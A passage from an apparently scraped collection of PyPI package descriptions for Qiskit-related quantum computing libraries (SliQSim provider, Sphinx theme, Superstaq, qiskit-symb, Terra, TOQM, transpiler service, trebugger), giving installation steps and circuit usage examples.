For more details of the simulator, please refer to thepaper.InstallationTo use this provider, one should first install IBM'sQiskit(<=0.36.2), and then install the provider with pip.pip install qiskit==0.36.2\npip install qiskit-sliqsim-providerExecutionThe gate set supported in SliQSim now contains Pauli-X (x), Pauli-Y (y), Pauli-Z (z), Hadamard (h), Phase and its inverse (s and sdg), \u03c0/8 and its inverse (t and tdg), Rotation-X with phase \u03c0/2 (rx(pi/2)), Rotation-Y with phase \u03c0/2 (ry(pi/2)), Controlled-NOT (cx), Controlled-Z (cz), Toffoli (ccx and mcx), SWAP (swap), and Fredkin (cswap).For simulation types, we provide both sampling(default) and statevector simulation options, where the sampling simulation samples outcomes from the output distribution obtained after the circuit is applied, and the statevector simulation calculates the resulting state vector of the quantum circuit. Please turn off the optimization (optimization_level=0) to avoid using gates out of supported gate set. The following examples demostrate the usage of the provider.# Import toolsfromqiskitimportQuantumCircuit,QuantumRegister,ClassicalRegister,executefromqiskit_sliqsim_providerimportSliQSimProvider# Initiate SliQSim Providerprovider=SliQSimProvider()# Construct a 2-qubit bell-state circuitqr=QuantumRegister(2)cr=ClassicalRegister(2)qc=QuantumCircuit(qr,cr)qc.h(qr[0])qc.cx(qr[0],qr[1])qc.measure(qr,cr)# Get the backend of sampling simulationbackend=provider.get_backend('sampling')# Execute simulationjob=execute(qc,backend=backend,shots=1024,optimization_level=0)# Obtain and print the resultsresult=job.result()print(result.get_counts(qc))In the abovePython code, we construct a 2-qubit bell-state circuit with measurement gates at the end, and execute the simulator with sampling simulation backend optionsampling. The sampled result is then printed:{'00': 523, '11': 501}Circuits can also be read from files inOpenQASMformat, which is used by Qiskit. Here we read acircuit, which is also a 2-qubit bell-state circuit but with no measurements gates, to showcase the statevector simulation:qc=QuantumCircuit.from_qasm_file(\"../SliQSim/examples/bell_state.qasm\")To execute the statevector simulation, the backend optionsamplingis replaced withall_amplitude:backend=provider.get_backend('all_amplitude')job=execute(qc,backend=backend,optimization_level=0)and after obtaining the results, we acquire the state vector instead of the counts of sampled outcomes:result=job.result()print(result.get_statevector(qc))The state vector is then printed:[0.707107+0.j 0. +0.j 0. +0.j 0.707107+0.j]One may also use our simulator by executing a compiled binary file. Check thisrepo.CitationPlease cite the following paper if you use our simulator for your research:Y. Tsai, J. R. Jiang, and C. Jhang, \"Bit-Slicing the Hilbert Space: Scaling Up Accurate Quantum Circuit Simulation to a New Level,\" 2020, arXiv: 2007.09304@misc{tsai2020bitslicing,title={Bit-Slicing the Hilbert Space: Scaling Up Accurate Quantum Circuit Simulation to a New Level},author={Yuan{-}Hung Tsai and Jie{-}Hong R. 
Jiang and Chiao{-}Shan Jhang},year={2020},note={arXiv: 2007.09304}}ContactIf you have any questions or suggestions, feel free tocreate an issue, or contact us throughmatthewyhtsai@gmail.com."} +{"package": "qiskit-sphinx-theme", "pacakge-description": "qiskit-sphinx-themeThe Sphinx themes for Qiskit and Qiskit Ecosystem documentation.Warning: new theme migrationIn qiskit-sphinx-theme 1.13, we added the newqiskittheme, which migrates from Pytorch to Furo for several improvements. qiskit-sphinx-theme 1.14 added theqiskit-ecosystemtheme. The old Pytorch theme will be removed in qiskit-sphinx-theme 2.0, which we expect to release in July or August 2023.See the sectionMigrate from old Pytorch theme to new themefor migration instructions.OverviewThis repository hosts three things:Qiskit Sphinx themes (located in thesrc/folder)Example Docs (located in theexample_docs/folder)Qiskit Docs Guide (located in thedocs_guide/folder)The Qiskit Sphinx Themes are the themes used by Qiskit Documentation (https://qiskit.org/documentation/) and Qiskit Ecosystem projects.The Example Docs is a minimal Sphinx project that is used for testing the Qiskit Sphinx Theme. Every\npull request will triggera GitHub workflowthat builds the Example Docs to make sure the changes do\nnot introduce unintended changes.The Qiskit Docs Guide hosts instructions, guidelines and recommendations of good documentation\npractices. Its intent is to help Qiskit maintainers improve the documentation of their projects.\nThe guide is hosted online here:https://qisk.it/docs-guide.InstallationThis package is available on PyPI using:pipinstallqiskit-sphinx-themeThen, set up the theme by updatingconf.py:Sethtml_theme = \"qiskit-ecosystem\"(only Qiskit Terra should useqiskit)Add\"qiskit_sphinx_theme\"toextensionsYou also likely want to sethtml_titleinconf.py. This results in the left sidebar having a more useful and concise name, along with the page title in the browser. Most projects will want to use this in theirconf.py:# Sphinx expects you to set these already.project=\"My Project\"release=\"4.12\"# This sets the title to e.g. `My Project 4.12`.html_title=f\"{project}{release}\"Enable translationsFirst, coordinate with the Translations team athttps://github.com/qiskit-community/qiskit-translationsto express your interest and to coordinate setting up the infrastructure.Once the Translations team is ready, then update yourconf.py:Ensure thatqiskit_sphinx_themeis in theextensionssetting.Set the optiontranslations_listto a list of pairs of the locale code and the language name, e.g.[..., (\"de_DE\", \"German\")].Set the optiondocs_url_prefixto your project's URL prefix, likeecosystem/finance.For example:extensions=[...,\"qiskit_sphinx_theme\",]translations_list=[('en','English'),('bn_BN','Bengali'),('fr_FR','French'),('de_DE','German'),]docs_url_prefix=\"ecosystem/finance\"Enable Previous ReleasesThis feature allows you to link to previous versions of the docs in the left sidebar.First, start additionally deploying your docs to/stable//, e.g./ecosystem/finance/stable/0.5/index.html. 
Seehttps://github.com/Qiskit/qiskit-experiments/blob/227867937a08075092cd11756214bee3fb1d4d3d/tools/deploy_documentation.sh#L38-L39for an example.Then, update yourconf.py:Ensure thatqiskit_sphinx_themeis in theextensionssetting.Add to the optionhtml_contextan entry forversion_listwith a list of the prior versions, e.g.[\"0.4\", \"0.5\"].Each of these versions must be deployed with the abovestable/URL scheme.You can manually set this, or some projects write a Sphinx extension to dynamically compute the value.You should only put prior versions in this list, not the current release.Set the optiondocs_url_prefixto your project's URL prefix, likeecosystem/finance.For example:extensions=[...,\"qiskit_sphinx_theme\",]html_context={\"version_list\":[\"0.4\",\"0.5\"],}docs_url_prefix=\"ecosystem/finance\"Use custom RST directivesTheqiskit_sphinx_themeextension defines the below custom directives for you to use in RST, if you'd like. Seeexample_docs/docs/sphinx_guide/custom_directives.rstfor examples of how to use them.qiskit-cardqiskit-call-to-action-itemandqiskit-call-to-action-gridEnable Qiskit.org AnalyticsQiskit.org uses Segment Analytics to collect information on traffic to sites under the qiskit.org domain. This is not enabled by default but if you would like to enable it you can add aanalytics_enabledvariable to thehtml_contextobject in yourconf.py. Setting this toTruewill enable analytics for your site once it is deployed toqiskit.org/.html_context={'analytics_enabled':True}By enabling analytics we will be able to collect information on number of visits to each documentation page. It will also trigger the addition of aWas this page helpful?component at the bottom of each documentation page, so users will be able to provide yes/no feedback for each page.If you do not enable analytics, no data will be collected and theWas this page helpful?component will not show.Add an announcement banner to all pages:warning:Note:This feature is currently only available for the Qiskit theme, it is not yet available in the Ecosystem themeTheqiskittheme includes the ability to add a custom announcement banner to every page. You can configure this in yourconf.pyby adding your\ncustom announcement text to thetheme_announcementvariable in thehtml_contextobject, for example:html_context = {\n \"theme_announcement\": \"\ud83c\udf89 Custom announcement text!\",\n}The above code will enable the following banner:You can also optionally add a \"Learn more\" url by additionally setting theannouncement_urlin thehtml_context, like so:html_context = {\n \"theme_announcement\": \"\ud83c\udf89 Custom announcement text!\",\n \"announcement_url\": \"https://example.com\"\n}The above code will render the following banner:The default text for the link is \"Learn more\" but you can provide custom link text by setting theannouncement_url_textin thehtml_context:html_context = {\n \"theme_announcement\": \"\ud83c\udf89 Custom announcement text!\",\n \"announcement_url\": \"https://example.com\",\n \"announcement_url_text\": \"Check it out\",\n}Customize or disable the Ecosystem theme logoTheqiskit-ecosystemtheme includes the Qiskit Ecosystem logo by default.You can use a custom logo by adding a logo file (SVG or PNG) as a sibling to yourconf.py, e.g.docs/logo.svg. 
Then, sethtml_logoinconf.pyto the name of the file, e.g.html_logo = \"logo.png\".When using a custom logo, you may want to disable the project's name in the sidebar by settingsidebar_hide_nameinhtml_theme_options:html_theme_options={\"sidebar_hide_name\":True,}You can disable logos by settingdisable_ecosystem_logoinhtml_theme_options:html_theme_options={\"disable_ecosystem_logo\":True,}IBM Projects: how to use blue color scheme for Ecosystem themeBy default, theqiskit-ecosystemtheme uses purple as an accent color. Most projects should continue to use this, but certain highly IBM-affiliated projects like Qiskit IBM Runtime can change the accent color to blue by setting upconf.pylike this:# Only intended for specific IBM projects.html_theme_options={\"light_css_variables\":{\"color-brand-primary\":\"var(--qiskit-color-blue)\",}}Migrate from old Pytorch theme to new themeIn qiskit-sphinx-theme 1.13, we migrated to a new Sphinx theme calledqiskit, which is based on Furo from the pip, Black, and attrs documentation. Seehttps://github.com/Qiskit/qiskit_sphinx_theme/issues/232for the motivation. qiskit-sphinx-theme 1.14 added theqiskit-ecosystemtheme for Ecosystem projects.qiskit-sphinx-theme 1.13+ continues to support the legacy Pytorch theme, but support will be removed in version 2.0.To migrate, inconf.py:Ensure that\"qiskit_sphinx_theme\"is in theextensionslist.Sethtml_theme = \"qiskit-ecosystem\"rather than\"qiskit_sphinx_theme\". (qiskitshould only be used by Qiskit Terra.)Remove allhtml_theme_options.Removeexpandable_sidebarfromhtml_context, if set. If it was set, follow the below sectionHow to migrate expandable_sidebar.Render the docs and check that everything looks how expected. If not, please open a GitHub issue or reach out on Slack for help.How to migrate expandable_sidebarWith the old theme, to have expandable folders, you had to have a dedicated.. toctree ::directive with a:caption:option, like this:..toctree:::caption:My Folder:hidden:Page 1 \n Page 2 Instead, the new theme will render the:caption:as a top-level section header in the left sidebar, with top-level entries for each page. See the screenshot in the PR description ofhttps://github.com/Qiskit/qiskit_sphinx_theme/pull/384for an example of how the old theme renders:caption:and compare tothe new theme.Additionally, the new theme renders pages with their own subpages as expandable folders, unlike the old theme.For example,will include all subpages that are listed in the.. toctree ::of the pageapidocs/index.rst.So, when migrating, you have to decide which behavior you want:Use the new theme's style. No changes necessary.Use the new theme's style, but get rid of the top level section header. To implement:Consolidate the.. toctree ::directive with earlier ones so that they are all in the sametoctree.Keep the:caption:as an expandable folder, rather than a top-level section header. To implement:Create a new directory and RST file likemy_folder/index.rst.Move the.. toctree::directive to that page.Get rid of the:caption:option.Link to the new filemy_folder/index.rstin the parentindex.rstby adding it to a.. 
toctree ::in the parent.Tip: suggested site structureTo keep UX/UI similar across different Qiskit packages, we encourage the following structure for you sidebar, which can be set in the toctree of yourindex.rst:..toctree:::hidden:Documentation Home \n Getting Started \n Tutorials \n How-to Guides \n API Reference \n Explanations \n Release Notes \n GitHub Each item in the toctree corresponds to a single.rstfile, and can use internal links or external. External links will have a \"new tab\" icon rendered next to them."} +{"package": "qiskit-superstaq", "pacakge-description": "qiskit-superstaqThis package is used to access Superstaq via a Web API throughQiskit. Qiskit programmers\ncan take advantage of the applications, pulse level optimizations, and write-once-target-all\nfeatures of Superstaq with this package.qiskit-superstaqisavailable on PyPIand can be installed with:pip install qiskit-superstaqPlease note that Python version3.8or higher is required. See installation instructionshere.Creating and submitting a circuit through qiskit-superstaqimportqiskitimportqiskit_superstaqasqsstoken=\"Insert superstaq token that you received from https://superstaq.infleqtion.com\"superstaq=qss.superstaq_provider.SuperstaqProvider(token)backend=superstaq.get_backend(\"ibmq_qasm_simulator\")qc=qiskit.QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure(0,0)qc.measure(1,1)print(qc)# Submitting a circuit to \"ibmq_qasm_simulator\". Providing the \"dry-run\" method parameter instructs Superstaq to simulate the circuit, and is available to free trial users.job=backend.run(qc,shots=100,method=\"dry-run\")print(job.result().get_counts())"} +{"package": "qiskit-symb", "pacakge-description": "Qiskit DemoDayspresentation $\\rightarrow$ :link:link,\npassword:Demoday20230615(15th June 2023)Jupyter notebook demo $\\rightarrow$ :link:link(15th June 2023)Qiskit Medium blog $\\rightarrow$ :link:link(28th June 2023)Table of contentsIntroductionInstallationUser-modeDev-modeUsage examplesSympifya Qiskit circuitLambdifya Qiskit circuitContributorsIntroductionTheqiskit-symbpackage is meant to be a Python tool to enable the symbolic evaluation of parametric quantum states and operators defined inQiskitby parameterized quantum circuits.A Parameterized Quantum Circuit (PQC) is a quantum circuit where we have at least one free parameter (e.g. a rotation angle $\\theta$). PQCs are particularly relevant in Quantum Machine Learning (QML) models, where the values of these parameters can be learned during training to reach the desired output.In particular,qiskit-symbcan be used to create a symbolic representation of a parametric quantum statevector, density matrix, or unitary operator directly from the Qiskit quantum circuit. This has been achieved through the re-implementation of some basic classes defined in theqiskit/quantum_info/module by usingsympyas a backend for symbolic expressions manipulation.InstallationUser-modepip install qiskit-symb:warning: The package requiresqiskit>=1. See the officialMigration guidesif you are used to a prevoius Qiskit version.Dev-modegit clone https://github.com/SimoneGasperini/qiskit-symb.git\ncd qiskit-symb\npip install -e .Usage examplesSympifya Qiskit circuitLet's get started on how to useqiskit-symbto get the symbolic representation of a given Qiskit circuit. 
In particular, in this first basic example, we consider the following quantum circuit:fromqiskitimportQuantumCircuitfromqiskit.circuitimportParameter,ParameterVectory=Parameter('y')p=ParameterVector('p',length=2)pqc=QuantumCircuit(2)pqc.ry(y,0)pqc.cx(0,1)pqc.u(0,*p,1)pqc.draw('mpl')To get thesympyrepresentation of the unitary matrix corresponding to the parameterized circuit, we just have to create the symbolicOperatorinstance and call theto_sympy()method:fromqiskit_symb.quantum_infoimportOperatorop=Operator(pqc)op.to_sympy()\\left[\\begin{matrix}\\cos{\\left(\\frac{y}{2} \\right)} & - \\sin{\\left(\\frac{y}{2} \\right)} & 0 & 0\\\\0 & 0 & \\sin{\\left(\\frac{y}{2} \\right)} & \\cos{\\left(\\frac{y}{2} \\right)}\\\\0 & 0 & e^{i \\left(p[0] + p[1]\\right)} \\cos{\\left(\\frac{y}{2} \\right)} & - e^{i \\left(p[0] + p[1]\\right)} \\sin{\\left(\\frac{y}{2} \\right)}\\\\e^{i \\left(p[0] + p[1]\\right)} \\sin{\\left(\\frac{y}{2} \\right)} & e^{i \\left(p[0] + p[1]\\right)} \\cos{\\left(\\frac{y}{2} \\right)} & 0 & 0\\end{matrix}\\right]If you want then to assign a value to some specific parameter, you can use thesubs()method passing a dictionary that maps each parameter to the desired corresponding value:new_op=op.subs({p:[-1,2]})new_op.to_sympy()\\left[\\begin{matrix}\\cos{\\left(\\frac{y}{2} \\right)} & - \\sin{\\left(\\frac{y}{2} \\right)} & 0 & 0\\\\0 & 0 & \\sin{\\left(\\frac{y}{2} \\right)} & \\cos{\\left(\\frac{y}{2} \\right)}\\\\0 & 0 & e^{i} \\cos{\\left(\\frac{y}{2} \\right)} & - e^{i} \\sin{\\left(\\frac{y}{2} \\right)}\\\\e^{i} \\sin{\\left(\\frac{y}{2} \\right)} & e^{i} \\cos{\\left(\\frac{y}{2} \\right)} & 0 & 0\\end{matrix}\\right]Lambdifya Qiskit circuitGiven a Qiskit circuit,qiskit-symbalso allows to generate a Python lambda function with actual arguments matching the Qiskit unbound parameters.\nLet's consider the following example starting from aZZFeatureMapcircuit, commonly used as a data embedding ansatz in QML applications:fromqiskit.circuit.libraryimportZZFeatureMappqc=ZZFeatureMap(feature_dimension=3,reps=1)pqc.draw('mpl')To get the Python function representing the final parameteric statevector, we just have to create the symbolicStatevectorinstance and call theto_lambda()method:fromqiskit_symb.quantum_infoimportStatevectorpqc=pqc.decompose()statevec=Statevector(pqc).to_lambda()We can now call the lambda-generated functionstatevecpassing thexvalues we want to assign to each parameter. The returned object will be anumpy2D-array (withshape=(8,1)in this case) representing the final output statevectorpsi.x=[1.24,2.27,0.29]psi=statevec(*x)This feature can be useful when, given a Qiskit PQC, we want to run it multiple times with different parameters values. 
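For instance, one might evaluate the same `statevec` lambda generated above for a batch of parameter sets (a small sketch; the parameter values themselves are made up, and `numpy` is used only to post-process the returned array):

```python
import numpy as np

# Reuse the lambda-generated statevector for several (made-up) parameter sets
# without repeating the symbolic evaluation.
parameter_sets = [[1.24, 2.27, 0.29], [0.10, 0.75, 1.80], [2.00, 0.33, 0.95]]
for x in parameter_sets:
    psi = statevec(*x)                      # numpy array of shape (8, 1)
    probabilities = np.abs(psi[:, 0]) ** 2  # measurement probabilities
    print(np.round(probabilities, 3))
```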
Indeed, we can perform a single symbolic evalutation and then call the lambda generated function as many times as needed, passing different values of the parameters at each iteration.ContributorsSimone Gasperini"} +{"package": "qiskit-tensorflow", "pacakge-description": "Qiskit Tensorflow: A Tensorflow based simulator backend for QiskitInstallationpipinstallqiskit-tensorflow"} +{"package": "qiskit-terra", "pacakge-description": "QiskitQiskitis an open-source SDK for working with quantum computers at the level of extended quantum circuits, operators, and primitives.This library is the core component of Qiskit, which contains the building blocks for creating and working with quantum circuits, quantum operators, and primitive functions (sampler and estimator).\nIt also contains a transpiler that supports optimizing quantum circuits and a quantum information toolbox for creating advanced quantum operators.For more details on how to use Qiskit, refer to the documentation located here:https://qiskit.org/documentation/InstallationWe encourage installing Qiskit viapip:pipinstallqiskitPip will handle all dependencies automatically and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thedocumentation.Create your first quantum program in QiskitNow that Qiskit is installed, it's time to begin working with Qiskit. The essential parts of a quantum program are:Define and build a quantum circuit that represents the quantum stateDefine the classical output by measurements or a set of observable operatorsDepending on the output, use the primitive functionsamplerto sample outcomes or theestimatorto estimate values.Create an example quantum circuit using theQuantumCircuitclass:importnumpyasnpfromqiskitimportQuantumCircuit# 1. A quantum circuit for preparing the quantum state |000> + i |111>qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpostionqc_example.p(np.pi/2,0)# add quantum phaseqc_example.cx(0,1)# 0th-qubit-Controlled-NOT gate on 1st qubitqc_example.cx(0,2)# 0th-qubit-Controlled-NOT gate on 2nd qubitThis simple example makes an entangled state known as aGHZ state$(|000\\rangle + i|111\\rangle)/\\sqrt{2}$. It uses the standard quantum gates: Hadamard gate (h), Phase gate (p), and CNOT gate (cx).Once you've made your first quantum circuit, choose which primitive function you will use. Starting withsampler,\nwe usemeasure_all(inplace=False)to get a copy of the circuit in which all the qubits are measured:# 2. Add the classical output in the form of measurement of all qubitsqc_measured=qc_example.measure_all(inplace=False)# 3. Execute using the Sampler primitivefromqiskit.primitives.samplerimportSamplersampler=Sampler()job=sampler.run(qc_measured,shots=1000)result=job.result()print(f\" > Quasi probability distribution:{result.quasi_dists}\")Running this will give an outcome similar to{0: 0.497, 7: 0.503}which is00050% of the time and11150% of the time up to statistical fluctuations.To illustrate the power of Estimator, we now use the quantum information toolbox to create the operator $XXY+XYX+YXX-YYY$ and pass it to therun()function, along with our quantum circuit. Note the Estimator requires a circuitwithoutmeasurement, so we use theqc_examplecircuit we created earlier.# 2. define the observable to be measuredfromqiskit.quantum_infoimportSparsePauliOpoperator=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])# 3. 
Execute using the Estimator primitivefromqiskit.primitivesimportEstimatorestimator=Estimator()job=estimator.run(qc_example,operator,shots=1000)result=job.result()print(f\" > Expectation values:{result.values}\")Running this will give the outcome4. For fun, try to assign a value of +/- 1 to each single-qubit operator X and Y\nand see if you can achieve this outcome. (Spoiler alert: this is not possible!)Using the Qiskit-providedqiskit.primitives.Samplerandqiskit.primitives.Estimatorwill not take you very far. The power of quantum computing cannot be simulated\non classical computers and you need to use real quantum hardware to scale to larger quantum circuits. However, running a quantum\ncircuit on hardware requires rewriting them to the basis gates and connectivity of the quantum hardware.\nThe tool that does this is thetranspilerand Qiskit includes transpiler passes for synthesis, optimization, mapping, and scheduling. However, it also includes a\ndefault compiler which works very well in most examples. The following code will map the example circuit to thebasis_gates = ['cz', 'sx', 'rz']and a linear chain of qubits $0 \\rightarrow 1 \\rightarrow 2$ with thecoupling_map =[[0, 1], [1, 2]].fromqiskitimporttranspileqc_transpiled=transpile(qc_example,basis_gates=['cz','sx','rz'],coupling_map=[[0,1],[1,2]],optimization_level=3)For further examples of using Qiskit you can look at the tutorials in the documentation here:https://qiskit.org/documentation/tutorials.htmlExecuting your code on real quantum hardwareQiskit provides an abstraction layer that lets users run quantum circuits on hardware from any vendor that provides a compatible interface.\nThe best way to use Qiskit is with a runtime environment that provides optimized implementations ofsamplerandestimatorfor a given hardware platform. This runtime may involve using pre- and post-processing, such as optimized transpiler passes with error suppression, error mitigation, and, eventually, error correction built in. A runtime implementsqiskit.primitives.BaseSamplerandqiskit.primitives.BaseEstimatorinterfaces. For example,\nsome packages that provide implementations of a runtime primitive implementation are:https://github.com/Qiskit/qiskit-ibm-runtimeQiskit also provides a lower-level abstract interface for describing quantum backends. This interface, located inqiskit.providers, defines an abstractBackendV2class that providers can implement to represent their\nhardware or simulators to Qiskit. The backend class includes a common interface for executing circuits on the backends; however, in this interface each provider may perform different types of pre- and post-processing and return outcomes that are vendor-defined. Some examples of published provider packages that interface with real hardware are:https://github.com/Qiskit/qiskit-ibm-providerhttps://github.com/qiskit-community/qiskit-ionqhttps://github.com/qiskit-community/qiskit-aqt-providerhttps://github.com/qiskit-community/qiskit-braket-providerhttps://github.com/qiskit-community/qiskit-quantinuum-providerhttps://github.com/rigetti/qiskit-rigettiYou can refer to the documentation of these packages for further instructions\non how to get access and use these systems.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines. By participating, you are expected to uphold ourcode of conduct.We useGitHub issuesfor tracking requests and bugs. 
Pleasejoin the Qiskit Slack communityfor discussion, comments, and questions.\nFor questions related to running or using Qiskit,Stack Overflow has aqiskit.\nFor questions on quantum computing with Qiskit, use theqiskittag in theQuantum Computing Stack Exchange(please, read first theguidelines on how to askin that forum).Authors and CitationQiskit is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.Changelog and Release NotesThe changelog for a particular release is dynamically generated and gets\nwritten to the release page on Github for each release. For example, you can\nfind the page for the0.9.0release here:https://github.com/Qiskit/qiskit-terra/releases/tag/0.9.0The changelog for the current release can be found in the releases tab:The changelog provides a quick overview of notable changes for a given\nrelease.Additionally, as part of each release detailed release notes are written to\ndocument in detail what has changed as part of a release. This includes any\ndocumentation on potential breaking changes on upgrade and new features.\nFor example, you can find the release notes for the0.9.0release in the\nQiskit documentation here:https://qiskit.org/documentation/release_notes.html#terra-0-9AcknowledgementsWe acknowledge partial support for Qiskit development from the DOE Office of Science National Quantum Information Science Research Centers, Co-design Center for Quantum Advantage (C2QA) under contract number DE-SC0012704.LicenseApache License 2.0"} +{"package": "qiskit-toqm", "pacakge-description": "Qiskit TOQMCIstatuspip buildswheelsQiskit Terratranspiler passes for theTime-Optimal Qubit Mapping(TOQM) algorithm.InstallationThis package is available on PyPI asqiskit-toqm.To install it, run:pipinstallqiskit-toqmAlternatively,Clone this repository recursively.Install it from source:pip install .Licensesqiskit-toqm is provided under the Apache 2.0 license that can be found in\nthe LICENSE file.pybind11 is provided under a BSD-style license that can be found in the LICENSE_pybind11\nfile.By using, distributing, or contributing to this project, you agree to the\nterms and conditions of both licenses."} +{"package": "qiskit-transpiler-service", "pacakge-description": "qiskit_transpiler_serviceA library to useQiskit Transpiler serviceand theAI transpiler passes.NoteThe Qiskit transpiler service and the AI transpiler passes use different experimental services that are only available for IBM Quantum Premium Plan users. 
This library and the releated services are an alpha release, subject to change.Installing the qiskit-transpiler-serviceTo use the Qiskit transpiler service, install theqiskit-transpiler-servicepackage:pipinstallqiskit-transpiler-serviceBy default, the package tries to authenticate to IBM Quantum services with the defined Qiskit API token, and uses your token from theQISKIT_IBM_TOKENenvironment variable or from the file~/.qiskit/qiskit-ibm.json(under the sectiondefault-ibm-quantum).How to use the libraryUsing the Qiskit Transpiler serviceThe following examples demonstrate how to transpile circuits using the Qiskit transpiler service with different parameters.Create a circuit and call the Qiskit transpiler service to transpile the circuit withibm_sherbrookeas thebackend_name, 3 as theoptimization_level, and not using AI during the transpilation.fromqiskit.circuit.libraryimportEfficientSU2fromqiskit_transpiler_service.transpiler_serviceimportTranspilerServicecircuit=EfficientSU2(101,entanglement=\"circular\",reps=1).decompose()cloud_transpiler_service=TranspilerService(backend_name=\"ibm_sherbrooke\",ai=False,optimization_level=3,)transpiled_circuit=cloud_transpiler_service.run(circuit)Note:you only can usebackend_namedevices you are allowed to with your IBM Quantum Account. Apart from thebackend_name, theTranspilerServicealso allowscoupling_mapas parameter.Produce a similar circuit and transpile it, requesting AI transpiling capabilities by setting the flagaitoTrue:fromqiskit.circuit.libraryimportEfficientSU2fromqiskit_transpiler_service.transpiler_serviceimportTranspilerServicecircuit=EfficientSU2(101,entanglement=\"circular\",reps=1).decompose()cloud_transpiler_service=TranspilerService(backend_name=\"ibm_sherbrooke\",ai=True,optimization_level=1,)transpiled_circuit=cloud_transpiler_service.run(circuit)Using the AIRouting pass manuallyTheAIRoutingpass acts both as a layout stage and a routing stage. It can be used within aPassManageras follows:fromqiskit.transpilerimportPassManagerfromqiskit_transpiler_service.ai.routingimportAIRoutingfromqiskit.circuit.libraryimportEfficientSU2ai_passmanager=PassManager([AIRouting(backend_name=\"ibm_sherbrooke\",optimization_level=2,layout_mode=\"optimize\")])circuit=EfficientSU2(101,entanglement=\"circular\",reps=1).decompose()transpiled_circuit=ai_passmanager.run(circuit)Here, thebackend_namedetermines which backend to route for, theoptimization_level(1, 2, or 3) determines the computational effort to spend in the process (higher usually gives better results but takes longer), and thelayout_modespecifies how to handle the layout selection.\nThelayout_modeincludes the following options:keep: This respects the layout set by the previous transpiler passes (or uses the trivial layout if not set). It is typically only used when the circuit must be run on specific qubits of the device. It often produces worse results because it has less room for optimization.improve: This uses the layout set by the previous transpiler passes as a starting point. It is useful when you have a good initial guess for the layout; for example, for circuits that are built in a way that approximately follows the device's coupling map. It is also useful if you want to try other specific layout passes combined with theAIRoutingpass.optimize: This is the default mode. It works best for general circuits where you might not have good layout guesses. 
This mode ignores previous layout selections.Using the AI circuit synthesis passesThe AI circuit synthesis passes allow you to optimize pieces of different circuit types (Clifford,Linear Function,Permutation) by re-synthesizing them. The typical way one would use the synthesis pass is the following:fromqiskit.transpilerimportPassManagerfromqiskit_transpiler_service.ai.routingimportAIRoutingfromqiskit_transpiler_service.ai.synthesisimportAILinearFunctionSynthesisfromqiskit_transpiler_service.ai.collectionimportCollectLinearFunctionsfromqiskit.circuit.libraryimportEfficientSU2ai_passmanager=PassManager([AIRouting(backend_name=\"ibm_cairo\",optimization_level=3,layout_mode=\"optimize\"),# Route circuitCollectLinearFunctions(),# Collect Linear Function blocksAILinearFunctionSynthesis(backend_name=\"ibm_cairo\")# Re-synthesize Linear Function blocks])circuit=EfficientSU2(10,entanglement=\"full\",reps=1).decompose()transpiled_circuit=ai_passmanager.run(circuit)The synthesis respects the coupling map of the device: it can be run safely after other routing passes without \"messing up\" the circuit, so the overall circuit will still follow the device restrictions. By default, the synthesis will replace the original sub-circuit only if the synthesized sub-circuit improves the original (currently only checking cnot count), but this can be forced to always replace the circuit by settingreplace_only_if_better=False.The following synthesis passes are available fromqiskit_transpiler_service.ai.synthesis:AICliffordSynthesis: Synthesis forCliffordcircuits (blocks ofH,SandCXgates). Currently up to 9 qubit blocks.AILinearFunctionSynthesis: Synthesis forLinear Functioncircuits (blocks ofCXandSWAPgates). Currently up to 9 qubit blocks.AIPermutationSynthesis: Synthesis forPermutationcircuits (blocks ofSWAPgates). Currently available for 65, 33, and 27 qubit blocks.We expect to gradually increase the size of the supported blocks.All passes use a thread pool to send several requests in parallel. By default it will use as max threads as number of cores plus four (default values forThreadPoolExecutorpython object). However, you can set your own value with themax_threadsargument at pass instantation. For example, the following line will instantiate theAILinearFunctionSynthesispass allowing it to use a maximum of 20 threads.AILinearFunctionSynthesis(backend_name=\"ibm_cairo\",max_threads=20)# Re-synthesize Linear Function blocks using 20 threads maxYou can also set the environment variableAI_TRANSPILER_MAX_THREADSto the desired number of maximum threads, and all syntheis passes instantiated after that will use that value.For sub-circuit to be synthesized by the AI synthesis passes, it must lay on a connected subgraph of the coupling map (this can be ensured by just doing a routing pass previous to collecting the blocks, but this is not the only way to do it). 
The synthesis passes will automatically check if a the specific subgraph where the sub-circuit lays is supported, and if it is not supported it will raise a warning and just leave the original sub-circuit as it is.To complement the synthesis passes we also provide custom collection passes for Cliffords, Linear Functions and Permutations that can be imported fromqiskit_transpiler_service.ai.collection:CollectCliffords: Collects Clifford blocks asInstructionobjects and stores the original sub-circuit to compare against it after synthesis.CollectLinearFunctions: Collects blocks ofSWAPandCXasLinearFunctionobjects and stores the original sub-circuit to compare against it after synthesis.CollectPermutations: Collects blocks ofSWAPcircuits asPermutations.These custom collection passes limit the sizes of the collected sub-circuits so that they are supported by the AI synthesis passes, so it is recommended to use them after the routing passes and before the synthesis passes to get a better optimization overall."} +{"package": "qiskit-trebugger", "pacakge-description": "Qiskit TrebuggerA new take on debuggers for quantum transpilers.\nThis repository presents a debugger for theqiskit transpilerin the form of a light weight jupyter widget. Built as a project for the Qiskit Advocate Mentorship Program, Fall 2021.InstallationTo install the debugger using pip (a python package manager), use -pipinstallqiskit-trebuggerPIP will handle the dependencies required for the package automatically and would install the latest version.To directly install via github follow the steps below after usinggit clone:gitclonehttps://github.com/TheGupta2012/qiskit-timeline-debugger.gitMake surepython3andpipare installed in your system. It is recommended to use a python virtual environment to install and develop the debuggercdinto theqiskit-timeline-debuggerdirectoryUsepip install -r requirements.txtto install the project dependenciesNext, executepip install .command to install the debuggerUsage InstructionsAfter installing the package, import theDebuggerinstance fromqiskit_trebuggerpackage.To run the debugger, simply replace the call totranspile()method of the qiskit module withdebug()method of your debugger instance.The debugger provides two types of views namelyjupyterandcliThecliview is the default view and recommender for users who want to use the debugger in a terminal environmentThejupyterview is recommended for usage in a jupyter notebook and provides a more interactive and detailed view of the transpilation process.For an example -fromqiskit.providers.fake_providerimportFakeCasablancafromqiskit.circuit.randomimportrandom_circuitfromqiskit_trebuggerimportDebuggerimportwarningswarnings.simplefilter('ignore')debugger=Debugger(view_type=\"jupyter\")backend=FakeCasablanca()circuit=random_circuit(num_qubits=4,depth=5,seed=44)# replace transpile 